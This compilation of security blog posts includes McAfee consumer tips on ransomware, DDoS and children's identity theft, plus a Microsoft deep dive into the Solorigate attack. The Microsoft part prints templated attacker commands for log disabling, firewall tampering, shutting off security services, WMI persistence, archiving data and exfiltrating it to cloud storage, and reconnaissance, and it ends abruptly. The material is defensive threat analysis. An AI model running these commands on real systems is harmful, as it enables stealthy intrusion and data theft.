According to Dark Reading, Miami-Dade County Public Schools experienced significant disruptions during their first three days of distance learning for the 2020-2021 school year, thanks to a series of DDoS attacks. The school system stated it had already experienced more than a dozen DDoS attacks since the start of the school year. Sandwich Public Schools in Massachusetts were also knocked offline by a DDoS attack. When school systems fall victim to DDoS attacks, students can lose access to essential documents, files, or online platforms that they need to complete assignments. And with many students relying heavily on distance learning systems, losing access could put them behind.

Delete Disruptions: Follow These Security Tips

In an effort to create a standardized framework for dealing with ransomware attacks across verticals – including education – McAfee has teamed up with Microsoft to lead the Ransomware Task Force, along with 17 other security firms, tech companies, and non-profits. And while we’re taking critical actions to decrease the threat of ransomware attacks, there are other steps you can take to prevent ransomware and DDoS attacks from interrupting your distance learning experience. Follow these tips to take charge of your education and live your digital life free from worry:

Don’t pay the ransom

Many ransom notes seem convincing, and many only request small, seemingly doable amounts of money. Nevertheless, you should never pay the ransom. Paying does not promise you’ll get your information back, and many victims often don’t. So, no matter how desperate you are for your files, hold off on paying up.

Do a complete backup 

With ransomware attacks locking away crucial data, it’s important to back up your files on all your machines. If a device becomes infected with ransomware, there’s no promise you’ll get that data back. Ensure you cover all your bases and have your data stored on an external hard drive or in the cloud.

Use decryption tools

No More Ransom – an initiative that teams up security firms, including McAfee, and law enforcement – provides tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then, check out No More Ransom’s decryption tools and see if one is available for your specific strain.

Secure your router

Your Wi-Fi router is the gateway to your network. Secure it by changing the default password. If you aren’t sure how to do this, consult the internet for instructions on how to do it for your specific make and model, or call the manufacturer. Solutions like McAfee Secure Home Platform, which is embedded within select routers, can help you easily manage and protect your network from DDoS attacks and more.

Change default passwords on IoT devices

A lot of internet of things (IoT) devices come with default usernames and passwords. After taking your IoT device out of the box, the first thing you should do is change those default credentials. If you’re unsure of how to change the default setting on your IoT device, refer to setup instructions or do a bit of research online.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Ransomware and DDoS is on the Rise: Tips for Distance Learning in 2021 appeared first on McAfee Blogs.

The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part Two

Holiday Video Chat


The Connected Lives of Babies: Protecting Their First Footprints in the Digital World, Part Two

Picture an infant with a credit card.
In her name. With a $10,000 limit.

Well, it happens. As recent as 2017, it was estimated that more than 1 million children in the U.S. were victims of identity theft. Of them, two-thirds were under the age of seven, and the total losses connected to all this fraud weighed in $2.6 billion dollars.

As I mentioned in part one of our article on the connected lives of babies, babies can make their first digital footprints before they’re even born. What’s more, the moment a child enters this world along with a unique ID like a Social Security Number, they become a tempting target for cybercriminals. The reason is this: babies and very young children are effectively a blank slate, upon which crooks can write their own illicit history of fraud. And it can be years before you or your child find out, long after the damage to their credit has been done.

So, let’s pick up where we left off in part one by taking a close look baby’s privacy and how you can protect it.

Protect baby’s identity

There’s rightfully a great deal of conversation out there about the things we can do to protect our identity from theft. What’s talked about less often is protecting children from identity theft. In fact, little ones are high-value targets for cybercriminals is because we typically don’t run credit reports on children. In this way, a crook with the Social Security Number of a child in the U.S. can open all manner of credit and accounts and go undetected for years until that child attempts to rent an apartment or open his or her first credit card.

To protect your family from this kind of identity theft, the major credit reporting agencies suggest the following:

I. Check your child’s credit regularly. If your child indeed has a credit report against their name, there’s a strong chance that their identity has been stolen. You can work directly with the credit reporting agency to begin resolving the issue. If there is theft, file a report with the appropriate law enforcement agency. You’ll want a record of this as you dispute any false records.
II. Freeze your child’s credit. A freeze will prevent access to your child’s report and thus prevent any illicit activity. In the U.S., you’ll need to create a separate freeze with each of the three major credit reporting agencies (Equifax, Experian, and TransUnion). It’s free to do so, yet you’ll have to do a little legwork to prove that you’re indeed the child’s parent or guardian.
III. Secure your documents and keep personal info close to the vest. Along with things like a passport, insurance cards, and birth certificates, store these items in a safe location when you’re not actively using them. That goes extra for Social Security cards. Likewise, doctor’s offices often ask patients for their Social Security Number, which typically helps with their billing. See if they can accept an alternative form of ID, use just the last four digits, or simply forgo it altogether.

Register a URL for your child

Getting your kiddo a website is probably low on your list of priorities, yet it’s a sound move to consider. Here’s why: it carves out a piece of digital real estate that’s theirs and theirs alone.

Whether you opt for a dot-com or one of several hundred other extensions like .net, .us, and .me, a personal URL gives you and your child ownership of yet another piece of their digital identity. No one else can own it as long as you’re paying the fee to maintain it. Think of it as an investment. Down the road, it could be used for a personal email address, a professional portfolio site someday, or just a side project in web design. With internet URLs being a finite resource, it’s wise to see if spending a relatively small fee each a year is worth securing this piece of your child’s identity.

Sharenting: Think of baby’s future

We all have one—that picture from our childhood that we absolutely dread because it’s embarrassing as all get-out. Now contrast that with today’s digital age, where an estimated 95 million photos are posted each day on Instagram alone. We’re chronicling our lives, our friends’ lives, and the lives of our families at an incredible rate—almost without thinking about it. And that opens a host of issues about privacy and just how much we share. Enter the notion of “sharenting,” a form of oversharing that can trample your child’s right to privacy.

For babies, we have to remember that they’re little people who, one day, before you know it, will grow up. How will some of those photos that seemed cute in the moment hold up when baby gets older? Will those photos that you posted prove embarrassing some day? Could they be used to harm their reputation or damage their sense of privacy and trust in you?

With that, let’s remember a couple things when it comes to sharing photos of our children:

• The internet is forever. Work on this basic assumption: once you post it, it’s online for good.
• Babies have a right to privacy too. It’s your job to protect it while they can’t.

So, before you post, run through that one-two mental checklist.

Sharenting: Identity Theft

Sharenting can also lead to identity theft. In 2018, Barclay’s financial services estimated that oversharing by parents on social media will amount to more than 7 million cases of identity theft a year by 2030—just shy of a billion dollars U.S. worth of damage. This includes all the tips and cues that crooks can glean from social media posts and geographic metadata that’s captured in photographic files. Things like birthdays, pet names, names of schools, favorite teams, maiden names, and so forth are all fodder for password hacks and targeted phishing attacks. The advice here is to keep your digital lives close to the vest:
I. Set all social media accounts to private. Nothing posted on the internet is 100% private. Even when you post to “friends only,” your content can still get copied and re-shared.
II. This way, the general public can’t see what you’re posting. However, keep in mind that nothing you ever post online is 100% private. Someone who has access to your page could just as easily grab a screenshot of your post and then continue to share it that way.
III. Go into your phone’s settings and disable location information for photos. Specifics will depend on the brand of your phone, but you should have an option via the phone’s “location services” settings or within the camera app itself. Doing so will prevent the geographic location, time, date, and even device type from appearing in the metadata of your photos.
IV. Above all, think twice about posting in the first place. “Do I really need to share this?” is the right question to ask, particularly if it can damage your child’s privacy or be used by a scammer in some form, whether today or down the road.

The first steps for keeping your family safe online

Like new parents don’t have enough to think about already! However, thinking about these things now at the earliest stages will get you and your growing family off on a strong and secure start, one that you can build on for years to come—right up to the day when they ask for their first smartphone. But you have a while before that conversation crops up, so enjoy!

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part Two appeared first on McAfee Blogs.

Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop

More than a month into the discovery of Solorigate, investigations continue to unearth new details that prove it is one of the most sophisticated and protracted intrusion attacks of the decade. Our continued analysis of threat data shows that the attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence. These attackers appear to be knowledgeable about operations security and performing malicious activity with minimal footprint. In this blog, we’ll share new information to help better understand how the attack transpired. Our goal is to continue empowering the defender community by helping to increase their ability to hunt for the earliest artifacts of compromise and protect their networks from this threat.

We have published our in-depth analysis of the Solorigate backdoor malware (also referred to as SUNBURST by FireEye), the compromised DLL that was deployed on networks as part of SolarWinds products, that allowed attackers to gain backdoor access to affected devices. We have also detailed the hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders, including the loader dubbed TEARDROP by FireEye and a variant named Raindrop by Symantec.

One missing link in the complex Solorigate attack chain is the handover from the Solorigate DLL backdoor to the Cobalt Strike loader. Our investigations show that the attackers went out of their way to ensure that these two components are separated as much as possible to evade detection. This blog provides details about this handover based on a limited number of cases where this process occurred. To uncover these cases, we used the powerful, cross-domain optics of Microsoft 365 Defender to gain visibility across the entire attack chain in one complete and consolidated view.

We’ll also share our deep dive into additional hands-on-keyboard techniques that the attackers used during initial reconnaissance, data collection, and exfiltration, which complement the broader TTPs from similar investigative blogs, such as those from FireEye and Volexity.

The missing link: From the Solorigate backdoor to Cobalt Strike implants

An attack timeline that SolarWinds disclosed in a recent blog showed that a fully functional Solorigate DLL backdoor was compiled at the end of February 2020 and distributed to systems sometime in late March.  The same blog also said that the attackers removed the Solorigate backdoor code from SolarWinds’ build environment in June 2020.

Considering this timeline and the fact that the Solorigate backdoor was designed to stay dormant for at least two weeks, we approximate that the attackers spent a month or so in selecting victims and preparing unique Cobalt Strike implants as well as command-and-control (C2) infrastructure. This approximation means that real hands-on-keyboard activity most likely started as early as May.

The removal of the backdoor-generation function and the compromised code from SolarWinds binaries in June could indicate that, by this time, the attackers had reached a sufficient number of interesting targets, and their objective shifted from deployment and activation of the backdoor (Stage 1) to being operational on selected victim networks, continuing the attack with hands-on-keyboard activity using the Cobalt Strike implants (Stage 2).

Timeline graph showing developments in the Solorigate attack

Figure 1. Timeline of the protracted Solorigate attack

But how exactly does this jump from the Solorigate backdoor (SUNBURST) to the Cobalt Strike loader (TEARDROP, Raindrop, and others) happen? What code gets triggered, and what indicators should defenders look for?

Figure 2. Diagram of transition between Stage 1 and Stage 2 of the Solorigate attack

Sophisticated attackers like those behind Solorigate have a goal of expansion and stealthy persistence to maximize the amount of time they can remain undetected and collect valuable information. It’s important for organizations to be able to look at forensic data across their entire environment to see how far attackers have traversed the network and how long they were there, in order to have confidence that attacks have been properly remediated from the environment. The best way to do that is with an extended detection and response (XDR) solution that enables organizations to replay past events to look for activity that might reveal the presence of an attacker on the network. Affected organizations without an XDR solution like Microsoft 365 Defender in place will have a difficult job of performing incident response.

What we found from our hunting exercise across Microsoft 365 Defender data further confirms the high level of skill of the attackers and the painstaking planning of every detail to avoid discovery. To illustrate, the following diagram shows the entry vector attack chain at a glance:

Figure 3. Transition from Solorigate backdoor to Cobalt Strike

We spent countless hours investigating Microsoft Defender telemetry and other signals from potential patient-zero machines running the backdoored version of SolarWinds DLL. Most of these machines communicated with the initial randomly generated DNS domain but without significant activity (step #1). However, we saw limited cases in May and June where the initial DNS network communication was closely followed by network activity on port 443 (HTTPS) to other legit-looking domains (step #7). On these handful of machines, we performed deep inspection of telemetry.

We know that the Solorigate backdoor only activates for certain victim profiles, and when this happens, the executing process (usually SolarWinds.BusinessLayerHost.exe) creates two files on disk (step #2):

  • A VBScript, typically named after existing services or folders to blend into legitimate activities on the machine
  • A second-stage DLL implant, a custom Cobalt Strike loader, typically compiled uniquely per machine and written into a legitimate-looking subfolder in %WinDir% (e.g., C:\Windows)

At this point the attackers are ready to activate the Cobalt Strike implant. However, the attackers apparently deem the powerful SolarWinds backdoor too valuable to lose in case of discovery, so they tried to separate the Cobalt Strike loader’s execution from the SolarWinds process as much as possible. Their hope is that, even if they lose the Cobalt Strike implant due to detection, the compromised SolarWinds binary and the supply chain attack that preceded it are not exposed.

The attackers achieved this by having the SolarWinds process create an Image File Execution Options (IFEO) Debugger registry value for the process dllhost.exe (step #3). This is a known MITRE ATT&CK technique used for persistence, but it could also be abused to trigger execution of malicious code when a certain process is launched. Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4.

The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy:

  • HKEY_CURRENT_USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
  • HKEY_CURRENT_USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL

Analyzing the custom Cobalt Strike loaders

In our investigation, we identified several second-stage malware, including TEARDROP, Raindrop, and other custom loaders for the Cobalt Strike beacon. During the lateral movement phase, the custom loader DLLs are dropped mostly in existing Windows sub-directories. Below are some example paths (additional paths are listed at the end of this blog):

  • C:\Windows\ELAMBKUP\WdBoot.dll
  • C:\Windows\Registration\crmlog.dll
  • C:\Windows\SKB\LangModel.dll
  • C:\Windows\AppPatch\AcWin.dll
  • C:\Windows\PrintDialog\appxsig.dll
  • C:\Windows\Microsoft.NET\Framework64\sbscmp30.dll
  • C:\Windows\Panther\MainQueueOnline.dll
  • C:\Windows\assembly\GAC_64\MSBuild\\msbuild.dll
  • C:\Windows\LiveKernelReports\KerRep.dll

The files have names that resemble legitimate Windows file and directory names, once again demonstrating how the attackers attempted to blend in the environment and hide in plain sight:

Legitimate Windows file/directory Malicious custom loader
C:\Windows\ELAMBKUP\WdBoot.sys C:\Windows\ELAMBKUP\WdBoot.dll
C:\Windows\Registration\CRMLog C:\Windows\Registration\crmlog.dll
C:\Windows\SKB\LanguageModels C:\Windows\SKB\LangModel.dll
C:\Windows\AppPatch\AcRes.dll C:\Windows\AppPatch\AcWin.dll
C:\Windows\PrintDialog\appxsignature.p7x C:\Windows\PrintDialog\appxsig.dll
C:\Windows\Microsoft.NET\Framework64\sbscmp10.dll C:\Windows\Microsoft.NET\Framework64\sbscmp30.dll
C:\Windows\Panther\MainQueueOnline0.que C:\Windows\Panther\MainQueueOnline.dll
C:\Windows\assembly\GAC_64\MSBuild\\MSBuild.exe C:\Windows\assembly\GAC_64\MSBuild\\msbuild.dll

TEARDROP, Raindrop, and the other custom Cobalt Strike Beacon loaders observed during the Solorigate investigation are likely generated using custom Artifact Kit templates. Each custom loader loads either a Beacon Reflective Loader or a preliminary loader that subsequently loads the Beacon Reflective Loader. Reflective DLL loading is a technique for loading a DLL into a process memory without using the Windows loader.

Figure 4. Structure of the two variants of Cobalt Strike Beacon loaders observed in Solorigate attacks

In the succeeding sections, we discuss the Cobalt Strike Beacon variants we observed in our Solorigate investigations.

Variant 1: TEARDROP

To date, Microsoft has analyzed two versions of the second-stage custom Cobalt Strike Beacon loader known as TEARDROP (detected as Trojan:Win64/Solorigate.SA!dha by Microsoft):

  • A service DLL (loaded by exe) with a ServiceMain function typically named NetSetupServiceMain
  • A standard non-Service DLL loaded by exe

Irrespective of the loading methodology, both versions have an export function that contains the trigger for the malicious code. The malicious code is executed in a new thread created by the export function. Upon execution, the malicious code attempts to open a file with a .jpg extension (e.g., festive_computer.jpg, upbeat_anxiety.jpg, gracious_truth.jpg, and confident_promotion.jpg). Further analysis is required to determine the purpose and role of the .jpg file referenced by each sample. The code also checks the presence of the Windows registry key SOFTWARE\Microsoft\CTF and terminates if the registry key is present or accessible. Next, the code proceeds to decode and subsequently execute an embedded custom preliminary loader.

Figure 5. Structure of Variant 1 custom loader

The preliminary loader used by this variant of custom loader is typically generated using a Cobalt Strike Artifact Kit template (e.g., bypass-pipe.c):

Figure 6. Disassembled function from the preliminary loader compiled from Artifact Kit’s bypass-pipe.c template

In its true form, the custom Artifact Kit-generated preliminary loader is a DLL that has been transformed and loaded like shellcode in memory. The preliminary loader is responsible for loading the next-stage component, which is a Beacon Reflective Loader/DLL (Cobalt Strike Beacon is compiled as a reflective DLL). The Reflective Loader ultimately initializes and executes Beacon in memory.

Variant 2: Additional custom loaders

In our investigations, we came across additional custom loaders for Cobalt Strike’s Beacon that appear to be generated using custom Cobalt Strike Artifact Kit templates. Unlike TEARDROP, in which the malicious code is triggered by an export function, the malicious code in these variants is triggered directly from the DLL’s entry point, which creates a new thread to execute the malicious code. These Variant 2 custom loaders also contain an attacker-introduced export (using varying names) whose only purpose is to call the Sleep() function every minute.

Figure 7. Example of a custom export function from a Variant 2 loader

Additionally, unlike TEARDROP, these variants do not contain a custom preliminary loader, meaning the loader DLL de-obfuscates and subsequently executes the Cobalt Strike Reflective DLL in memory.

Figure 8. Structure of Variant 2 custom Loader

These custom loaders can be further divided into two types:

  • Type A: A set of large DLLs that decode and load the Cobalt Strike Reflective Loader from the DLL’s DATA section (detected as Trojan:Win64/Solorigate.SC!dha by Microsoft)
  • Type B: A set of smaller DLLs that de-obfuscate and load the Reflective Loader from the DLL’s CODE section (also referred to as Raindrop by Symantec, detected as Trojan:Win64/Solorigate.SB!dha by Microsoft)

Figure 9. Two subtypes of the custom Loader

The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. Type A loaders use a simple rolling XOR methodology to decode the Reflective Loader, while Type B loaders (Raindrop) utilize a combination of the AES-256 encryption algorithm (unique key per sample), LZMA compression, and a single-byte XOR decoding routine to de-obfuscate the embedded Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory.

Forensic observations about the Solorigate Cobalt Strike loaders

Metadata and timeline analysis of the custom loaders, combined with analysis of the configuration data extracted from each Beacon payload, led to following discoveries:

  • The custom loader DLLs were introduced to compromised systems between the hours of 8:00 AM and 5:00 PM UTC. In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment by BusinessLayerHost.exe at around 10:00 AM UTC.
  • The custom loader DLLs dropped on disk carried compile timestamps ranging from July 2020 to October 2020, while the embedded Reflective DLLs carried compile timestamps ranging from March 2016 to November 2017. The presence of 2016-2017 compile timestamps is likely due to attackers’ usage of custom Malleable C2 profiles with synthetic compile timestamp (compile_time) values. At first glance it would appear as if the actor did not timestamp the compile time of the custom loader DLLs (2020 compile timestamps). However, forensic analysis of compromised systems revealed that in a few cases, the timestamp of the custom loader DLLs’ introduction to systems predated the compile timestamps of the custom loader DLLs (i.e., the DLLs appear to have been compiled at a future date).
  • Both Variant 1 and 2 custom loader DLLs were configured with PE version information that masquerades version information belonging to legitimate applications and files from Windows (e.g., DLL), 7-Zip (e.g., 7z.dll), Far Manager (e.g., Far.dll), LibIntl (e.g., libintl3.dll), and other legitimate applications. The Variant 2 custom loaders were mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e., the open-source source code for these applications was modified to add in the malicious code). In some instances, certain development artifacts were left behind in the custom loader samples. For example, the following C++ header (.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code (c:\build\workspace\cobalt_cryptor_far (dev071)\farmanager\far\platform.concurrency.hpp):

Figure 10. File path for a C++ header file (.hpp) observed in custom Cobalt Strike loader samples

  • Each custom loader DLL contains a designated PE export function that either triggers the malicious functionality of the loader (in Variant 1) or calls the Sleep() function (Variant 2). A non-comprehensive list of these PE export function names (one per loader DLL) is included below (note the repeating “Tk” prefix in the export names that can be a useful indicator for hunting purposes):
__GetClasterInf FreeSetupRevoke Tk_GetRootCoords TkComputeAnchor TkpSetMainMenubar
__RtlProjectObj GetLimitStroke Tk_IntersectTextLayout TkDebugBorder TkSelPropProc
__TkGlobal NetSetupServiceMain Tk_NameOf3DBorder TkFindStateString TkWinCancelMouseTimer
_XInitImageFuncPtrs RestVirtAlloc Tk_PostscriptImage TkGetDefaultScreenName TkWinClipboardRender
CreateLocalThread SetTkPrv Tk_QueryAllocMem TkGrabState XClearWindow
CreateProcessTVI Tk_GetElementBox Tk_SizeOfImage TkpSetKeycodeAndState XCreateBitmapFromData
  • In addition to the attackers dropping the custom loaders in unique locations on each system during the lateral movement phase, most Beacon and Reflective Loader instances discovered during our investigation were configured with a unique C2 domain name, unique Watermark ID, unique PE compile timestamp, PE Original Name (), DNS Idle IP (e.g., 84[.]200[.]70[.]40 , 208[.]67[.]220[.]220, 208[.]67[.]222[.]222, 9[.]9[.]9[.]9, and 8[.]8[.]4[.]4), unique User-Agent and HTTP POST/GET transaction URI, sleep time, and jitter factor. This is notable since no two Beacon instances shared the same C2 domain name, Watermark, or other aforementioned configuration values. Other than certain internal fields, most Beacon configuration fields are customizable via a Malleable C2 profile. If the actor did indeed use custom Malleable C2 profiles, as evidenced in the list above, the profiles varied greatly for Beacon instances used during different lateral movement campaigns within the same network. As mentioned above, each Beacon instance carries a unique Watermark value. Analysis of the Watermark values revealed that all Watermark values start with the number ‘3’, for example:
0x30343131 0x34353633 0x38303535 0x38383238
0x32323638 0x35373331 0x38353138 0x38383430
  • As for post-exploitation artifacts, the observed Beacon instances were configured to use different “spawnto” values, which Cobalt Strike uses to spawn a temporary process and inject its post-exploitation-related components or features into the spawned process. This detail could be valuable for hunting process creation events originated by exe. Below are some example paths used by the observed Beacon instances:
    • %WINDIR%\System32\conhost.exe
    • %WINDIR%\System32\control.exe
    • %WINDIR%\System32\dllhost.exe
    • %WINDIR%\System32\help.exe
    • %WINDIR%\System32\LogonUI.exe
    • %WINDIR%\System32\msiexec.exe
    • %WINDIR%\System32\print.exe
    • %WINDIR%\SysWOW64\audiodg.exe
    • %WINDIR%\SysWOW64\help.exe
    • %WINDIR%\SysWOW64\msiexec.exe
    • %WINDIR%\SysWOW64\msinfo32.exe
    • %WINDIR%\SysWOW64\print.exe
    • %WINDIR%\SysWOW64\WerFault.exe

Additional attacker tactics, anti-forensic behavior, and operational security

As mentioned, the attackers behind Solorigate are skillful and methodic operators who follow operations security (OpSec) best practices to minimize traces, stay under the radar, and avoid detection.

During our in-depth analysis of the attacker’s tactics, techniques, and procedures (TTPs) seen through the lens of Microsoft 365 Defender’s rich telemetry, we observed a few techniques that are worth disclosing to help other defenders better respond to this incident and use hunting tools like Microsoft 365 Defender advanced hunting or Azure Sentinel queries to search for potential traces of past activity.

Some examples of why these attackers stand out for their professional OpSec methodology and anti-forensic behavior are listed below:

  • Methodic avoidance of shared indicators for each compromised host. As discussed in the previous section, each Cobalt Strike DLL implant was prepared to be unique per machine and avoided at any cost overlap and reuse of folder name, file name, export function names, C2 domain/IP, HTTP requests, timestamp, file metadata, config, and child process launched. This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Applying this level of permutations for each individual compromised machine is an incredible effort normally not seen with other adversaries and done to prevent full identification of all compromised assets inside a network or effective sharing of threat intel between victims.
  • Camouflage and blending into the environment. Tools and binaries used by the attackers (e.g., ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations.
  • Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward.
  • In a similar way, before running noisy network enumeration activities (such as repeated NSLOOKUP or LDAP queries), the attackers carefully prepared special firewall rules to minimize outgoing packets for certain protocols. The firewall rules were also methodically removed after the network reconnaissance was completed.
  • Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services.
  • We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.

See some of the most interesting and unique TTPs in the table below. In most cases, commands and tools are executed via an intermediate “cmd.exe /C” process launched from the Cobalt Strike main parent process. We are actively working with MITRE to make sure that any novel technique emerging from this incident is documented in future updates of the ATT&CK framework.

Observed attacker behavior Example MITRE ATT&CK
Attackers always ran the TEARDROP implant through rundll32.exe, which is also the main process used in communicating with the C2.

Execution of additional commands from rundll32.exe seemed to be often interleaved with “cmd.exe /C”. This info can be useful for hunting this specific process tree chain as showed in the example.

When the attackers needed to execute more risky actions on objectives (e.g., credential theft, or recon), they spawned an additional dllhost.exe process with no command-line, which is a rare event.

rundll32.exe c:\windows\[folder]\[beacon].dll [export]
-> cmd.exe /C
-> [additional command]
T1218.011 | Defense Evasion – Signed Binary Proxy Execution: Rundll32
When executed during lateral movement, rundll32.exe ran through WMIC or Invoke-WMIMethod with “High” integrity level and spawned by WmiPrvSE.exe, which is a rare combination. The Cobalt Strike DLL was likely deleted after completed execution to avoid forensic recovery. Variant1 (executed from PowerShell as a result of issuing the “remote-exec” Cobalt Strike command):
Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\Windows\[folder]\[beacon].dll [export]’ -ComputerName [target]Variant2 (executed from rundll32.exe):
wmic /node:[target] process call create “rundll32 c:\windows\[folder]\[beacon].dll [export]”
T1047 | Windows Management Instrumentation (WMI)
A WMI event filter was used to invoke a command-line event consumer at system boot time to  launch a backdoor with rundll32.exe. instance of __eventfilter
eventnamespace = “”root\\cimv2″”;
name = “”__timeritem””;
query = “”select * from __instancemodificationevent within 70 where targetinstance isa ‘win32_perfformatteddata_perfos_system’ and targetinstance.systemuptime >= 300 and targetinstance.systemuptime < 400″”;
querylanguage = “”wql””;
perm. consumer:
instance of commandlineeventconsumer
commandlinetemplate = “”c:\\windows\\system32\\rundll32.exe c:\\windows\\[folder]\\[beacon].dll, [export]””;
executablepath = “”c:\\windows\\system32\\rundll32.exe””;
name = “”setpolicytrace””;
Attackers used AUDITPOL to prevent the collection of additional audit logs and evidence trail. auditpol  /GET /category:”Detailed Tracking”

auditpol  /set /category:”Detailed Tracking” /success:disable /failure:disable

[execution of several commands and actions]

auditpol /set /category:”Detailed Tracking” /success:enable /failure:enable

T1562.002 | Defense Evasion – Impair Defenses: Disable Windows Event Logging
Attackers used NETSH to configure firewall rules that limit certain UDP outbound packets (to reduce noise or footprint) before intense recon with NSLOOKUP and ADFIND.


netsh  advfirewall firewall add rule name=”[rulename1]” protocol=UDP dir=out localport=137 action=block
netsh  advfirewall firewall add rule name=”[rulename2]” protocol=UDP dir=out localport=53 action=block[execution of several network recon]netsh advfirewall firewall delete rule name=”[rulename1]”netsh advfirewall firewall delete rule name=”[rulename2]”
T1562.004 | Defense Evasion –
Impair Defenses: Disable or Modify System Firewall
Attackers used fsutil to check available free space before executing collection, enumeration, exfiltration, or launching attacks like DCSync which might create large files on disk. fsutil  volume diskfree c:
Attackers used multiple command-line utilities to enumerate running process, services, and signed-in users on a remote system before attempting lateral movement. – tasklist /v /s [target]
– query user /server:[target]
– schtasks /query /v /s [target] /fo csv
– sc \\[target] query type=service state=all
– wmic /node:”[target]” service get name,startname
T1047 | Windows Management Instrumentation (WMI),
T1057 | Process Discovery
Attackers used the service control manager on a remote system to disable services associated with security monitoring products. They then moved laterally to the remote system and, when the move was complete, they re-enabled the services on the source machine where they were operating previously to avoid raising warnings. On Source Machine:
sc \\[dest_machine] stop [service name][perform lateral move Source->Dest]once on Dest Machine:
sc \\[source_machine] start [service name]
T1562.001 | Defense Evasion –
Impair Defenses: Disable or Modify Tools
Attackers set the service start registry key for security monitoring products to “disabled” (i.e., DWORD value of “4”). This prevented security products from loading when the system starts. In some cases, the attackers waited to perform activity on the system until the system restarts and security monitoring products were disabled. reg add HKLM\system\currentcontrolset\services\[service name] /v Start /t REG_DWORD /d 4″ T1562.001 | Defense Evasion –
Impair Defenses: Disable or Modify Tools
Attackers modified timestamps of backdoors to match a legitimate Windows file (e.g., arp.exe). n/a T1070.006 | Indicator Removal on Host: Timestomp
Attackers used the 7-zip utility to create a password-protected archive with an extension not associated with archive files. In some cases they also used the flag “-v” to split the archive in multiple files for easier exfiltration. 7z.exe a -mx9 -r0 -p[password-redacted] .\[filename1].zip .\[filename2].log or .txt

7z.exe a -v500m -mx9 -r0 -p[password-redacted] .\[filename1].zip .\[filename2].log or .txt

T1560.001 | Archive Collected Data: Archive via Utility
Attackers mapped a OneDrive share from the command-line using the net.exe command-line utility, possibly for exfiltration; other cloud services like Google Drive were most likely also used. net use [drive]: “[user-id]” /u:[username] [password] T1567.002 |
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Attackers attempted to access Group Managed Service Account (gMSA) passwords with account credentials they have already obtained. n/a T1555 |
Credentials from Password Stores
Attackers leveraged privileged accounts to replicate directory service data with Domain Controllers (e.g., a DCSync attack). n/a T1003.006 |
OS Credential Dumping: DCSync
Attackers obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principal Names (SPNs) to crack offline (e.g., Kerberoasting). n/a T1558.003 |
Steal or Forge Kerberos Tickets: Kerberoasting
Attackers executed multiple times the legitimate ADFIND tool to enumerate domains, remote systems, accounts and to discover trust between federated domains. The tool was executed with a renamed filename chosen to blend into the existing environment or mimicking existing network services. [renamed-adfind].exe -h [internal domain] -sc u:[user] > .\\[machine]\[file].[log|txt]

[renamed-adfind].exe -sc u:* > .\[folder]\[file].[log|txt]

[renamed-adfind].exe -h [machine] -f (name=”Domain Admins”) member -list | [renamed-adfind].exe -h [machine] -f objectcategory=* > .\[folder]\[file].[log|txt]

Some examples of [renamed-adfind] observed by Microsoft and other security researchers::


T1482 |
Domain Trust DiscoveryT1018 |
Remote System Discovery



As we continue to gain deeper understanding of the Solorigate attack, we get a clearer picture of the skill level of the attackers and the extent of planning they put into pulling off one of the most sophisticated attacks in recent history. The combination of a complex attack chain and a protracted operation means that defensive solutions need to have comprehensive cross-domain visibility into attacker activity and provide months of historical data with powerful hunting tools to investigate as far back as necessary.

Modern attacks like Solorigate highlight the need for organizations to use advanced security solutions like Microsoft 365 Defender and Azure Sentinel and operate security response under an “assume breach” mentality. Microsoft 365 Defender harnesses the power of multiple capabilities and coordinates protection across domains to provide comprehensive defense. Azure Sentinel collects data from multiple data sources, including Microsoft 365 Defender, to connect data together and allow broad hunting for attacker activity.

In our ongoing forensic analysis of known Solorigate cases with malicious activity occurring between May and November 2020, we have in some instances seen the following relevant alerts generated by Microsoft Defender for Endpoint and Microsoft Defender for Identity. Incident responders and defenders investigating Solorigate incidents during that timeframe can refer to these alerts, alone or in combination, as potential indicators of the Solorigate activity.

Microsoft Defender for Endpoint alerts:

  • Low-reputation arbitrary code executed by signed executable
  • Suspicious ‘Atosev’ behavior was blocked
  • Suspicious Remote WMI Execution
  • A WMI event filter was bound to a suspicious event consumer

Microsoft Defender for Identity alerts:

